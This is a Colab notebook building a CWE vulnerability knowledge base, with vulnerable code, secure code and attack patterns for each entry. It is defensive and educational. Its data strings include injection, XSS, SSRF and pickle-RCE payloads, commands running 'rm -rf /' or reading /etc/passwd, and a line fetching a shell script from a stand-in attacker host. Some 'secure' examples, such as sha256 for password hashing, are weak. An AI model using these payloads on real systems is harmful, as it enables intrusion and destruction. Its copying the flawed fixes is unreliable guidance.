<a href="https://colab.research.google.com/github/nmsmnhs/30-Days-Of-Python/blob/master/blue.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [1]:
import torch
import subprocess

# Check GPU
try:
    gpu_info = subprocess.check_output('nvidia-smi', shell=True).decode()
    if 'T4' in gpu_info:
        print("Tesla T4 GPU detected")
    elif 'P100' in gpu_info:
        print("P100 GPU detected")
    elif 'V100' in gpu_info:
        print("V100 GPU detected")
    else:
        print("Unknown GPU")
except:
    print("Could not check GPU details")

# GPU memory check
if torch.cuda.is_available():
    print(f"GPU: {torch.cuda.get_device_name()}")

    # memory functions
    if hasattr(torch.cuda, 'memory_allocated'):
        allocated = torch.cuda.memory_allocated() / 1024**3
    else:
        allocated = 0

    total_memory = torch.cuda.get_device_properties(0).total_memory / 1024**3
    print(f"Total GPU Memory: {total_memory:.2f} GB")
    print(f"Currently Allocated: {allocated:.2f} GB")

    if total_memory >= 15:
        print("Plenty of GPU memory")
    elif total_memory >= 8:
        print("Limited GPU memory, we'll use quantization")
    else:
        print("Very limited GPU memory, using smallest models")
else:
    print("No GPU available - using CPU only (will be slow)")

!pip install -q chromadb sentence-transformers transformers accelerate bitsandbytes
!pip install -q datasets huggingface_hub
!pip install -q requests beautifulsoup4 lxml

print("Environment setup complete")


Could not check GPU details, but continuing...
No GPU available - using CPU only (will be slow)
[2K     [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m67.3/67.3 kB[0m [31m2.0 MB/s[0m eta [36m0:00:00[0m
[?25h  Installing build dependencies ... [?25l[?25hdone
  Getting requirements to build wheel ... [?25l[?25hdone
  Preparing metadata (pyproject.toml) ... [?25l[?25hdone
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m20.4/20.4 MB[0m [31m58.7 MB/s[0m eta [36m0:00:00[0m
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m60.1/60.1 MB[0m [31m9.0 MB/s[0m eta [36m0:00:00[0m
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m278.2/278.2 kB[0m [31m9.3 MB/s[0m eta [36m0:00:00[0m
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m2.0/2.0 MB[0m [31m15.9 MB/s[0m eta [36m0:00:00[0m
[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m103.3/103.3 kB[0m [31m1.8 MB/s[0m eta [36m0:00:00[0m
[2K   [90m━

In [2]:
# vuln database
import json
import re

vulnerabilities = [
    {
        "id": "CWE-89",
        "title": "SQL Injection",
        "description": "Constructing SQL commands with user input without proper sanitization, allowing attackers to execute arbitrary SQL",
        "category": "Injection",
        "severity": "High",
        "code_examples": {
            "vulnerable": [
                "query = \"SELECT * FROM users WHERE id = \" + user_input",
                "sql = f\"DELETE FROM products WHERE name = '{product_name}'\"",
                "cursor.execute(\"UPDATE accounts SET balance = \" + amount + \" WHERE user = '\" + username + \"'\")",
                "db.query(`SELECT * FROM orders WHERE status = ${status}`)",
                # Attacker payload patterns
                "user_input = \"' OR 1=1 --\"",
                "user_input = \"'; DROP TABLE users --\"",
                "user_input = \"1 UNION SELECT password FROM users --\""
            ],
            "secure": [
                "cursor.execute(\"SELECT * FROM users WHERE id = %s\", (user_input,))",
                "cursor.execute(\"DELETE FROM products WHERE name = %s\", (product_name,))",
                "cursor.execute(\"UPDATE accounts SET balance = %s WHERE user = %s\", (amount, username))",
                "db.query('SELECT * FROM orders WHERE status = ?', [status])"
            ]
        },
        "attack_patterns": [
            "SQL meta-characters: ', \\\", ;, --, /*, */, #",
            "Tautologies: OR 1=1, AND 1=0, ' or 'a'='a",
            "Union attacks: UNION SELECT, ORDER BY with large numbers",
            "Time-based: sleep(5), benchmark() calls",
            "Error-based: single quotes to trigger SQL errors"
        ],
        "mitigation": "Use parameterized queries or prepared statements. Validate and sanitize all user inputs. Use ORM frameworks with built-in protection."
    },
    {
        "id": "CWE-79",
        "title": "Cross-site Scripting (XSS)",
        "description": "Rendering user input without proper escaping, allowing attackers to execute JavaScript in victim's browser",
        "category": "XSS",
        "severity": "Medium",
        "code_examples": {
            "vulnerable": [
                "response.write('<div>' + user_comment + '</div>')",
                "element.innerHTML = user_input",
                "document.write(window.location.search)",
                "ReactDOM.render(<div dangerouslySetInnerHTML={{__html: userContent}} />)",
                # Attacker payload patterns
                "user_input = \"<script>alert('XSS')</script>\"",
                "user_input = \"<img src=x onerror=alert(1)>\"",
                "user_input = \"javascript:alert(document.cookie)\"",
                "user_input = \"'><svg onload=alert(1)>\""
            ],
            "secure": [
                "response.write('<div>' + escape(user_comment) + '</div>')",
                "element.textContent = user_input",
                "ReactDOM.render(<div>{userContent}</div>)",
                "use DOMPurify.sanitize(user_input) before innerHTML"
            ]
        },
        "attack_patterns": [
            "HTML tags: <script>, <img>, <iframe>, <svg>, <math>",
            "Event handlers: onerror=, onclick=, onmouseover=, onload=",
            "JavaScript protocols: javascript:, data:text/html",
            "Encoded payloads: &lt;script&gt;, %3Cscript%3E",
            "DOM manipulation: document.cookie, eval(), innerHTML, outerHTML"
        ],
        "mitigation": "Escape all user-controlled data contextually (HTML, JavaScript, CSS, URLs). Use Content Security Policy (CSP). Validate input and use safe APIs."
    },
    {
        "id": "CWE-352",
        "title": "Cross-Site Request Forgery (CSRF)",
        "description": "Allowing attackers to trick users into executing unwanted actions on a web application where they're authenticated",
        "category": "CSRF",
        "severity": "Medium",
        "code_examples": {
            "vulnerable": [
                "# No CSRF token in form",
                "<form action=\"/transfer\" method=\"POST\">\n  <input name=\"amount\">\n  <input name=\"to_account\">\n</form>",
                "# State-changing GET endpoint",
                "GET /delete_user?id=123",
                "# No origin/referrer check",
                "if user.is_authenticated:\n    process_transfer(request.POST['amount'])"
            ],
            "secure": [
                "<form action=\"/transfer\" method=\"POST\">\n  <input type=\"hidden\" name=\"csrf_token\" value=\"{{ csrf_token }}\">\n  <input name=\"amount\">\n</form>",
                "# Use framework CSRF protection\n@csrf_protect\ndef transfer_money(request):\n    ...",
                "# Verify CSRF token\nif not validate_csrf_token(request):\n    return HttpResponseForbidden()"
            ]
        },
        "attack_patterns": [
            "Auto-submitting forms: <form onload=\"submit()\">",
            "Image-based CSRF: <img src=\"https://victim/transfer?to=attacker&amount=1000\">",
            "Cross-origin requests without tokens",
            "State-changing GET requests",
            "Hidden forms on attacker sites targeting victim endpoints"
        ],
        "mitigation": "Use anti-CSRF tokens. Validate same-origin/referrer headers. Use framework built-in CSRF protection. Avoid state-changing GET requests."
    },
    {
        "id": "CWE-78",
        "title": "OS Command Injection",
        "description": "Executing operating system commands with unsanitized user input",
        "category": "Injection",
        "severity": "High",
        "code_examples": {
            "vulnerable": [
                "os.system('ping ' + user_input)",
                "subprocess.call(f\"ls {directory}\", shell=True)",
                "os.popen('cat ' + filename)",
                # Attacker payload patterns
                "user_input = \"8.8.8.8; rm -rf /\"",
                "user_input = \"file.txt && cat /etc/passwd\"",
                "user_input = \"| whoami\""
            ],
            "secure": [
                "subprocess.run(['ping', user_input], shell=False)",
                "subprocess.run(['ls', directory], shell=False)",
                "subprocess.run(['cat', filename], shell=False)"
            ]
        },
        "attack_patterns": [
            "Command separators: ;, &&, ||, |",
            "Subshell execution: $(whoami), `whoami`",
            "Argument injection: --option=value",
            "Path traversal in commands",
            "Environment variable injection"
        ],
        "mitigation": "Use subprocess module with shell=False. Pass arguments as lists. Validate and sanitize all command inputs. Use allowlists for allowed commands."
    },
    {
        "id": "CWE-22",
        "title": "Path Traversal",
        "description": "Accessing files outside intended directory using relative paths",
        "category": "File Access",
        "severity": "High",
        "code_examples": {
            "vulnerable": [
                "file = open('/var/www/uploads/' + filename)",
                "file = open(os.path.join(BASE_DIR, user_provided_path))",
                # Attacker payload patterns
                "filename = \"../../../etc/passwd\"",
                "filename = \"..\\..\\windows\\system32\\config\\SAM\"",
                "filename = \"....//....//....//etc/passwd\""
            ],
            "secure": [
                "file = open(os.path.join('/var/www/uploads/', os.path.basename(filename)))",
                "file = open(os.path.join(BASE_DIR, 'safe_subdir', os.path.basename(user_provided_path)))",
                "# Use allowlist validation\nif filename not in ALLOWED_FILES:\n    raise SecurityError()"
            ]
        },
        "attack_patterns": [
            "Relative paths: ../, ..\\",
            "Encoded paths: %2e%2e%2f, ..%2f",
            "Double encoding: %252e%252e%252f",
            "Null bytes: ../../../etc/passwd%00",
            "Absolute paths: /etc/passwd, C:\\Windows\\System32\\"
        ],
        "mitigation": "Validate file paths, use basename(), restrict access to intended directories, use allowlists for allowed files."
    },
    {
        "id": "CWE-798",
        "title": "Hard-coded Credentials",
        "description": "Storing passwords, API keys, or cryptographic keys in source code",
        "category": "Secrets",
        "severity": "Critical",
        "code_examples": {
            "vulnerable": [
                "API_KEY = \"sk-1234567890abcdef\"",
                "DB_PASSWORD = \"super_secret_123\"",
                "SECRET_KEY = \"hardcoded_in_source_code\"",
                "config = {'password': 'plaintext_pass'}"
            ],
            "secure": [
                "API_KEY = os.environ.get('API_KEY')",
                "DB_PASSWORD = os.environ.get('DB_PASSWORD')",
                "SECRET_KEY = os.environ.get('SECRET_KEY')",
                "# Use secret management service\npassword = secrets_manager.get('db_password')"
            ]
        },
        "attack_patterns": [
            "Plaintext passwords in source files",
            "API keys in configuration files",
            "Private keys in repositories",
            "Database connection strings in code",
            "Encryption keys hardcoded"
        ],
        "mitigation": "Use environment variables, secret management systems, or secure configuration files excluded from version control. Never commit secrets."
    },
    {
        "id": "CWE-502",
        "title": "Insecure Deserialization",
        "description": "Deserializing untrusted data without validation, allowing remote code execution",
        "category": "Input Validation",
        "severity": "Critical",
        "code_examples": {
            "vulnerable": [
                "data = pickle.loads(user_data)",
                "obj = yaml.load(user_input, Loader=yaml.Loader)",
                "obj = marshal.loads(user_data)",
                "# Attacker payload - Python pickle RCE\n\"\"\"cposix\nsystem\np0\n(S'rm -rf /'\np1\ntp2\nRp3\n.\"\"\""
            ],
            "secure": [
                "# Use JSON instead of pickle for untrusted data\ndata = json.loads(user_data)",
                "# Use safe YAML loader\nobj = yaml.load(user_input, Loader=yaml.SafeLoader)",
                "# Validate data before deserialization\nif not is_trusted_source(user_data):\n    raise SecurityError()"
            ]
        },
        "attack_patterns": [
            "Pickle/marshal deserialization of untrusted data",
            "YAML deserialization with unsafe loader",
            "Java ObjectInputStream with external data",
            ".NET BinaryFormatter with user input",
            "PHP unserialize() with attacker-controlled data"
        ],
        "mitigation": "Avoid deserializing untrusted data. Use safe formats like JSON. Validate all serialized data. Use allowlists for allowed classes."
    },
    {
        "id": "CWE-918",
        "title": "Server-Side Request Forgery (SSRF)",
        "description": "Making arbitrary HTTP requests from server based on user input, allowing access to internal resources",
        "category": "Input Validation",
        "severity": "High",
        "code_examples": {
            "vulnerable": [
                "requests.get(user_provided_url)",
                "urllib.request.urlopen(user_input)",
                "http.get(user_controlled_endpoint)",
                "# Attacker payload patterns\n\"http://localhost:22\"\n\"http://169.254.169.254/latest/meta-data/\"\n\"file:///etc/passwd\""
            ],
            "secure": [
                "if user_provided_url in ALLOWED_DOMAINS:\n    requests.get(user_provided_url)",
                "# Use allowlist for internal resources\nif is_allowed_internal_url(url):\n    requests.get(url)",
                "# Validate and sanitize URLs\nparsed_url = urlparse(user_input)\nif parsed_url.hostname not in ALLOWED_HOSTS:\n    raise SecurityError()"
            ]
        },
        "attack_patterns": [
            "Internal IP addresses: 127.0.0.1, localhost, 169.254.169.254",
            "Cloud metadata endpoints",
            "File protocol: file:///etc/passwd",
            "Internal service ports: :22, :3306, :5432",
            "DNS rebinding attacks"
        ],
        "mitigation": "Validate and whitelist allowed URLs or domains. Block internal IP ranges. Use URL parsing and validation. Implement outbound firewall rules."
    },
    {
    "id": "CWE-125",
    "title": "Out-of-Bounds Read",
    "description": "Reading data beyond the intended boundary of a buffer, potentially exposing sensitive information or causing crashes",
    "category": "Memory Safety",
    "severity": "Medium-High",
    "code_examples": {
        "vulnerable": [
            "memcpy(dest, src, user_controlled_size)",
            "read(fd, buffer, untrusted_count)",
            "strncpy(dest, src, external_size)",
            "buffer[user_index] = value",
            "fread(ptr, 1, user_specified_size, file)",
            "*(pointer + untrusted_offset)",
            "// Attacker payload patterns",
            "length=9999999",
            "size=0xFFFFFFFF",
            "index=-1",
            "offset=4294967295",
            "pos=1000000"
        ],
        "secure": [
            "if (user_size < buffer_size) memcpy(dest, src, user_size)",
            "count = min(user_count, sizeof(buffer)); read(fd, buffer, count)",
            "strncpy(dest, src, min(n, sizeof(dest)-1)); dest[sizeof(dest)-1] = '\\0'",
            "if (index >= 0 && index < buffer_size) buffer[index] = value",
            "size_t safe_size = min(requested_size, MAX_SAFE_SIZE); fread(ptr, 1, safe_size, file)"
        ]
    },
    "attack_patterns": [
        "Unusually large length fields: len=9999999, size=0xFFFFFFFF",
        "Negative/underflow values: -1, 4294967295 when cast unsigned",
        "Length mismatch probes: declared size X but send less/more data",
        "Malformed headers claiming huge payload length",
        "Repeated read requests with incremental index probes",
        "Index walking: reading at index i, i+1000, etc."
    ],
    "mitigation": "Validate all size and index inputs against buffer boundaries. Use bounds-checked functions. Enable compiler sanitizers (ASAN). Prefer safe containers with built-in bounds checking."
    },
    {
    "id": "CWE-787",
    "title": "Out-of-Bounds Write",
    "description": "Writing data beyond the intended boundary of a buffer, potentially corrupting memory, executing arbitrary code, or causing crashes",
    "category": "Memory Safety",
    "severity": "High-Critical",
    "code_examples": {
        "vulnerable": [
            "strcpy(dest, user_input)",
            "sprintf(buffer, \"%s\", user_string)",
            "memcpy(dest, src, unchecked_user_size)",
            "for (i=0; i<=user_length; i++) buffer[i] = data[i]",
            "malloc(user_count * sizeof(struct item))",
            "realloc(ptr, new_size); continue_using(ptr)",
            "// Attacker payload patterns",
            "Content-Length: 10000000",
            "AAAAAAAA...[long repeated pattern]",
            "boundary-testing sizes: 1023, 1024, 1025"
        ],
        "secure": [
            "strncpy(dest, src, sizeof(dest)-1); dest[sizeof(dest)-1] = '\\0'",
            "snprintf(buffer, sizeof(buffer), \"%s\", user_string)",
            "if (size <= dest_size) memcpy(dest, src, size)",
            "for (i=0; i < min(user_length, buffer_size); i++) buffer[i] = data[i]",
            "if (user_count > MAX_SAFE_COUNT) return error;",
            "new_ptr = realloc(ptr, new_size); if (new_ptr) ptr = new_ptr"
        ]
    },
    "attack_patterns": [
        "Oversized input blobs with large length fields",
        "Expansion-triggering tokens causing encoding growth",
        "Off-by-one probes: n, n+1 boundary testing",
        "Boundary-walking payloads with slight length variations",
        "Chunked uploads with inconsistent size declarations"
    ],
    "mitigation": "Use bounds-checked string functions (strncpy, snprintf). Validate all size calculations. Use static analysis tools. Enable stack protection. Prefer modern memory-safe languages."
    },
    {
    "id": "CWE-416",
    "title": "Use-After-Free",
    "description": "Accessing memory after it has been freed, potentially leading to information disclosure, code execution, or crashes",
    "category": "Memory Safety",
    "severity": "High",
    "code_examples": {
        "vulnerable": [
            "free(ptr); ...; ptr->method()",
            "delete object; ...; object->field = value",
            "free(ptr); free(ptr); // double free",
            "return_local_freed_pointer() { free(buf); return buf; }",
            "global_ptr = malloc(100); free(global_ptr); use(global_ptr)",
            "// Attacker sequence patterns",
            "DELETE /resource/123 → GET /resource/123",
            "Close session → Access session data",
            "Concurrent free/use requests"
        ],
        "secure": [
            "free(ptr); ptr = NULL;",
            "delete object; object = nullptr;",
            "if (ptr) { free(ptr); ptr = NULL; }",
            "// Use smart pointers",
            "std::unique_ptr<Object> obj = std::make_unique<Object>()",
            "std::shared_ptr<Resource> res = std::make_shared<Resource>()",
            "// RAII patterns",
            "class ResourceGuard { ~ResourceGuard() { cleanup(); } }"
        ]
    },
    "attack_patterns": [
        "Free-then-use sequences: free resource then access same ID",
        "Race conditions: concurrent free and use operations",
        "Memory reuse: free A, allocate controlled B, use A pointer",
        "Double-free patterns triggering heap corruption",
        "Session/timeout based UAF: access after cleanup"
    ],
    "mitigation": "Use smart pointers and RAII. Null pointers after freeing. Implement proper ownership semantics. Use memory sanitizers. Avoid manual memory management in critical code."
    },
    {
    "id": "CWE-190",
    "title": "Integer Overflow or Wraparound",
    "description": "Integer operations that wrap around or overflow, leading to buffer size miscalculations and subsequent memory corruption",
    "category": "Arithmetic",
    "severity": "High",
    "code_examples": {
        "vulnerable": [
            "size_t total = len1 + len2; // can overflow",
            "int size = width * height * bpp; // multiplication overflow",
            "malloc(count * sizeof(struct item))",
            "buffer[size - 1] = '\\0'; // if size == 0",
            "unsigned int new_size = old_size + user_increment",
            "// Attacker payload patterns",
            "width=0x10000, height=0x10000, bpp=4",
            "len1=0xFFFFFFFF, len2=1",
            "count=0x40000000, sizeof(item)=16"
        ],
        "secure": [
            "if (len1 > SIZE_MAX - len2) return error; size_t total = len1 + len2",
            "if (width > MAX_SAFE_DIM || height > MAX_SAFE_DIM) return error",
            "if (count > SIZE_MAX / sizeof(struct item)) return error",
            "if (size > 0 && size <= buffer_size) buffer[size-1] = '\\0'",
            "if (user_increment > SIZE_MAX - old_size) return error"
        ]
    },
    "attack_patterns": [
        "Large multiplication factors causing overflow",
        "Addition of large numbers causing wraparound",
        "Negative values in unsigned contexts",
        "Size calculations with boundary values",
        "Array index calculations with overflow"
    ],
    "mitigation": "Use overflow-checked arithmetic operations. Validate all size calculations. Use compiler builtins (__builtin_add_overflow). Prefer fixed-size limits for allocations."
    },
    {
    "id": "CWE-476",
    "title": "NULL Pointer Dereference",
    "description": "Accessing or dereferencing a null pointer, causing application crashes and potential denial of service",
    "category": "Memory Safety",
    "severity": "Medium",
    "code_examples": {
        "vulnerable": [
            "ptr->method(); // without checking ptr",
            "char c = *pointer; // pointer might be NULL",
            "strcpy(dest, NULL);",
            "memcpy(NULL, src, len)",
            "return global_ptr->field; // global_ptr not initialized",
            "// Attacker triggers",
            "Send malformed packet causing allocation failure",
            "Provide input that causes error path with NULL return"
        ],
        "secure": [
            "if (ptr != NULL) ptr->method()",
            "if (pointer) char c = *pointer",
            "if (dest && src) strcpy(dest, src)",
            "if (dest && src && len > 0) memcpy(dest, src, len)",
            "if (global_ptr) return global_ptr->field",
            "// Use references instead of pointers where possible",
            "Object& obj = getObject(); // throws if not found"
        ]
    },
    "attack_patterns": [
        "Inputs causing allocation failures",
        "Error conditions returning NULL pointers",
        "Malformed data triggering NULL returns from parsers",
        "Resource exhaustion leading to failed allocations",
        "API misuse with NULL parameters"
    ],
    "mitigation": "Always check pointers before dereferencing. Use static analysis to detect potential NULL dereferences. Initialize pointers properly. Use language features that prevent NULL (references, Option types)."
    },
    {
    "id": "CWE-862",
    "title": "Missing Authorization",
    "description": "Failure to properly verify user permissions for accessing resources or performing actions, leading to broken access control",
    "category": "Access Control",
    "severity": "High",
    "code_examples": {
        "vulnerable": [
            "@app.route('/admin/users')\ndef get_users(): return users  # No auth check",
            "if user.is_authenticated: return data  # No role/ownership check",
            "if user.id == request.json['user_id']: allow_access()  # Trusts client ID",
            "if request.headers.get('X-Role') == 'admin': grant_privileges()",
            "// Attacker patterns",
            "GET /admin/users from low-privilege account",
            "PUT /users/123 with {user_id: 456} to access other user",
            "GET /internal/debug without admin role"
        ],
        "secure": [
            "@app.route('/admin/users') @require_role('admin') def get_users(): ...",
            "if user.is_authenticated and user.has_permission('view_data'): return data",
            "if user.id == resource.owner_id: allow_access()  # Server-side check",
            "if user.role == 'admin': grant_privileges()  # Server-side validation",
            "// Centralized middleware",
            "@app.before_request def check_authorization(): validate_permissions()"
        ]
    },
    "attack_patterns": [
        "ID manipulation: changing user_id, account_id in requests",
        "Forceful browsing: accessing /admin, /internal, /debug endpoints",
        "Role escalation: testing admin endpoints with low-privilege accounts",
        "Parameter tampering: modifying object IDs in URLs or body",
        "Missing scope exploitation: using JWTs without proper claims"
    ],
    "mitigation": "Implement centralized authorization middleware. Validate ownership server-side using authenticated user context. Use role-based access control (RBAC) or attribute-based access control (ABAC). Never trust client-supplied authorization flags."
    },
    {
    "id": "CWE-434",
    "title": "Unrestricted Upload of File with Dangerous Type",
    "description": "Allowing users to upload files without proper validation, potentially enabling remote code execution or system compromise",
    "category": "Input Validation",
    "severity": "High-Critical",
    "code_examples": {
        "vulnerable": [
            "file.save('/webroot/uploads/' + filename)  # No validation",
            "move_uploaded_file($_FILES['file']['tmp_name'], $uploadPath)",
            "// Only client-side validation",
            "if request.files['file'].filename.endswith('.jpg'): accept()",
            "// Trusting Content-Type header",
            "if file.content_type == 'image/jpeg': save_file(file)",
            "// Attacker payloads",
            "shell.jpg.php with double extension",
            "image.svg with <script>alert('xss')</script>",
            "../../etc/passwd with path traversal"
        ],
        "secure": [
            "if is_safe_file(file.content, file.filename): save_file(file)",
            "// Server-side content validation",
            "magic_bytes = file.read(4)\nif magic_bytes not in ALLOWED_SIGNATURES: reject()",
            "// Safe filename generation",
            "safe_name = secure_filename(user_filename)\nunique_name = f\"{uuid4()}_{safe_name}\"",
            "// Store outside webroot",
            "file.save('/var/storage/uploads/' + safe_name)",
            "// Serve via secure endpoint",
            "@app.route('/uploads/<path>') def serve_file(path): check_auth(); return send_file()"
        ]
    },
    "attack_patterns": [
        "Double extensions: .jpg.php, .png.exe",
        "Content-Type spoofing: image/jpeg for PHP file",
        "Magic byte manipulation: fake image headers",
        "Path traversal: ../../../malicious.php",
        "SVG with embedded JavaScript",
        "Large files for denial of service"
    ],
    "mitigation": "Validate file content using magic bytes, not just extensions. Generate unique server-side filenames. Store files outside webroot or use object storage. Set proper permissions. Scan files for malware. Implement size and rate limits."
    },
    {
    "id": "CWE-94",
    "title": "Code Injection",
    "description": "Allowing user input to influence code generation or execution, potentially leading to remote code execution",
    "category": "Injection",
    "severity": "Critical",
    "code_examples": {
        "vulnerable": [
            "eval(user_input)  # Direct code execution",
            "os.system(f\"echo {user_data}\")  # Command injection",
            "template.render(user_content)  # Unsafe template rendering",
            "new Function('return ' + user_input)()",
            "Runtime.getRuntime().exec(user_command)",
            "// Attacker payloads",
            "{{7*7}} in template context",
            "'; DROP TABLE users -- in dynamic SQL",
            "`rm -rf /` in shell command",
            "${java.lang.Runtime.getRuntime().exec('calc')}"
        ],
        "secure": [
            "// Avoid eval entirely",
            "result = safe_eval(user_input, {'math': math})  # Restricted",
            "// Parameterized queries",
            "cursor.execute(\"SELECT * FROM users WHERE name = %s\", (username,))",
            "// Safe template rendering",
            "template.render(sanitized_content)",
            "// Command execution with validation",
            "if is_safe_command(user_cmd): subprocess.run([user_cmd], shell=False)",
            "// Use declarative configuration",
            "config = json.loads(user_input)  # Not code"
        ]
    },
    "attack_patterns": [
        "Template injection: {{malicious_code}}, ${expression}",
        "Command injection: ;, |, &&, backticks",
        "JavaScript injection: Function(), eval()",
        "SQL injection: ', UNION, DROP",
        "Expression language injection: #{...}, ${...}",
        "Dynamic code loading: import(), require()"
    ],
    "mitigation": "Avoid dynamic code evaluation entirely. Use parameterized queries and prepared statements. Sandbox user code execution with strict resource limits. Validate and sanitize all inputs. Use safe template engines with auto-escaping enabled."
    },
    {
    "id": "CWE-20",
    "title": "Improper Input Validation",
    "description": "Failure to properly validate, sanitize, or canonicalize user input, leading to various security vulnerabilities",
    "category": "Input Validation",
    "severity": "Medium-High",
    "code_examples": {
        "vulnerable": [
            "user_id = request.params['id']  # No validation",
            "age = int(user_input)  # No try/catch",
            "filename = user_file.filename  # Direct use",
            "balance = float(request.json['amount'])  # No range check",
            "// Attacker patterns",
            "id=abc123 in numeric field",
            "name=AAAAAAAA... (1000+ chars)",
            "date=2050-01-01 for birthdate",
            "amount=-1000 for transaction",
            "encoding=%00null%00byte"
        ],
        "secure": [
            "user_id = validate_int(request.params['id'], min=1, max=100000)",
            "try: age = int(user_input) except: return error",
            "filename = secure_filename(user_file.filename)",
            "schema = {'amount': {'type': 'float', 'min': 0, 'max': 10000}}",
            "// Centralized validation",
            "validator = Schema({'id': Coerce(int), 'name': Length(max=255)})",
            "// Framework validation",
            "class UserInput(BaseModel): id: conint(gt=0); name: constr(max_length=100)"
        ]
    },
    "attack_patterns": [
        "Type confusion: strings in numeric fields, arrays vs scalars",
        "Boundary testing: min/max values, negative numbers",
        "Length probes: very long strings, buffer overflow attempts",
        "Encoding attacks: null bytes, UTF-8 anomalies, double encoding",
        "Semantic violations: future birthdates, negative amounts"
    ],
    "mitigation": "Implement centralized input validation using schemas (JSON Schema, Pydantic, Joi). Validate types, ranges, lengths, and formats. Canonicalize and normalize inputs. Use strict parsing with proper error handling. Implement fuzz testing in CI/CD."
    },
    {
    "id": "CWE-77",
    "title": "Command Injection",
    "description": "Improper neutralization of special elements used in OS commands, allowing attackers to execute arbitrary commands",
    "category": "Injection",
    "severity": "Critical",
    "code_examples": {
        "vulnerable": [
            "os.system(\"ping \" + user_input)",
            "subprocess.Popen(user_command, shell=True)",
            "Runtime.getRuntime().exec(\"ls \" + filename)",
            "ProcessBuilder(\"cmd\", \"/c\", user_input).start()",
            "// Attacker payloads",
            "127.0.0.1; cat /etc/passwd",
            "google.com && rm -rf /",
            "file.txt | whoami",
            "`curl http://attacker.com/shell.sh`"
        ],
        "secure": [
            "subprocess.run(['ping', user_input], shell=False)",
            "// Input validation",
            "if not is_safe_hostname(user_input): reject()",
            "subprocess.run(['ping', validated_input])",
            "// Safe execution with escaping",
            "import shlex",
            "safe_cmd = shlex.quote(user_input)",
            "// Use library functions instead of shell",
            "os.listdir(directory)  # Instead of ls via shell"
        ]
    },
    "attack_patterns": [
        "Shell metacharacters: ;, |, &, `, $(), >, <",
        "Command chaining: &&, ||",
        "Path traversal: ../../../etc/passwd",
        "Redirection: > /etc/passwd, < input.txt",
        "Subshell execution: $(command), `command`"
    ],
    "mitigation": "Avoid shell command execution with user input. Use array parameterization (shell=False). Validate and whitelist allowed inputs. Use library functions instead of shell commands. If shell is unavoidable, use proper escaping and run with minimal privileges."
    },
    {
    "id": "CWE-287",
    "title": "Improper Authentication",
    "description": "Failure to properly verify the identity of users, allowing unauthorized access to system resources",
    "category": "Authentication",
    "severity": "High",
    "code_examples": {
        "vulnerable": [
            "if password == db_password: login()  # Plaintext compare",
            "if request.headers['X-Admin'] == 'true': allow()",
            "jwt.decode(token, verify=False)  # No signature check",
            "session_id = request.cookies.get('session') or request.args.get('sess')",
            "// Attacker patterns",
            "admin:admin credentials",
            "JWT with alg:none or weak signature",
            "Session fixation: preset session IDs",
            "Credential stuffing: many login attempts"
        ],
        "secure": [
            "if bcrypt.verify(password, stored_hash): login()",
            "if user.role == 'admin': allow()  # Server-side check",
            "jwt.decode(token, key=SECRET, algorithms=['HS256'])",
            "session_id = generate_secure_session()",
            "// Multi-factor authentication",
            "if not verify_2fa(user, token): reject()",
            "// Rate limiting",
            "@limiter.limit(\"5/minute\") def login(): ...",
            "// Secure session management",
            "session['user_id'] = user.id; session.regenerate()"
        ]
    },
    "attack_patterns": [
        "Credential stuffing: automated login attempts with common passwords",
        "JWT manipulation: alg:none, weak signatures, expired tokens",
        "Session fixation: preset session IDs before login",
        "Authentication bypass: ?admin=true, weak default credentials",
        "Timing attacks: response differences in login failures"
    ],
    "mitigation": "Use strong password hashing (bcrypt/Argon2). Implement proper JWT validation (signature, expiry, issuer). Use server-side session management with secure generation. Implement MFA for sensitive operations. Rate limit authentication attempts and monitor for brute force attacks."
    },
    {
    "id": "CWE-200",
    "title": "Information Exposure",
    "description": "Inadvertent exposure of sensitive information to unauthorized actors through errors, logs, or responses",
    "category": "Information Security",
    "severity": "Medium",
    "code_examples": {
        "vulnerable": [
            "print(f\"Error connecting to DB: {password}\")",
            "return {\"error\": f\"User {username} not found\"}",
            "logger.debug(f\"Processing SSN: {user_ssn}\")",
            "response.headers['Server'] = 'Apache/2.4.1 (Unix)'",
            "// Attacker probes",
            "Invalid input to trigger error messages",
            "Path traversal to access config files",
            "ID enumeration to discover valid users"
        ],
        "secure": [
            "logger.error(\"Database connection failed\")  # Generic",
            "return {\"error\": \"Invalid credentials\"}  # Uniform messages",
            "logger.info(\"Processing user data\")  # No PII",
            "response.headers['Server'] = ''  # Remove or generic",
            "// Error handling",
            "try: operation() except: return generic_error()",
            "// Data masking",
            "def mask_ssn(ssn): return '***-**-' + ssn[-4:]",
            "// Access controls",
            "if not user.can_view(other_user): return 404"
        ]
    },
    "attack_patterns": [
        "Error message mining: triggering detailed stack traces",
        "ID enumeration: sequential user/order IDs",
        "Verbose logging: sensitive data in application logs",
        "Server banner grabbing: version disclosure",
        "Directory listing: exposed file indexes"
    ],
    "mitigation": "Implement generic error messages. Avoid exposing sensitive data in logs. Use uniform responses for failures. Remove or genericize server headers. Implement proper access controls. Mask sensitive data in UI and APIs. Regular security scanning for information leaks."
    },
    {
    "id": "CWE-327",
    "title": "Use of a Broken or Risky Cryptographic Algorithm",
    "description": "Using deprecated, weak, or inappropriate cryptographic algorithms that can be compromised",
    "category": "Cryptography",
    "severity": "High",
    "code_examples": {
        "vulnerable": [
            "cipher = DES.new(key, DES.MODE_ECB)",
            "hash = hashlib.md5(password).hexdigest()",
            "cipher = ARC4.new(key)",
            "signature = hmac.new(key, msg, hashlib.sha1)",
            "// Weak configurations",
            "SSLv3 or TLS 1.0 enabled",
            "RSA with 1024-bit keys",
            "Custom crypto implementation"
        ],
        "secure": [
            "cipher = AES.new(key, AES.MODE_GCM)",
            "hash = hashlib.sha256(password).hexdigest()",
            "// Modern algorithms",
            "from cryptography.fernet import Fernet",
            "cipher = Fernet.generate_key()",
            "// Proper key management",
            "key = os.urandom(32)  # Adequate entropy",
            "// TLS configuration",
            "ssl_context = ssl.create_default_context()",
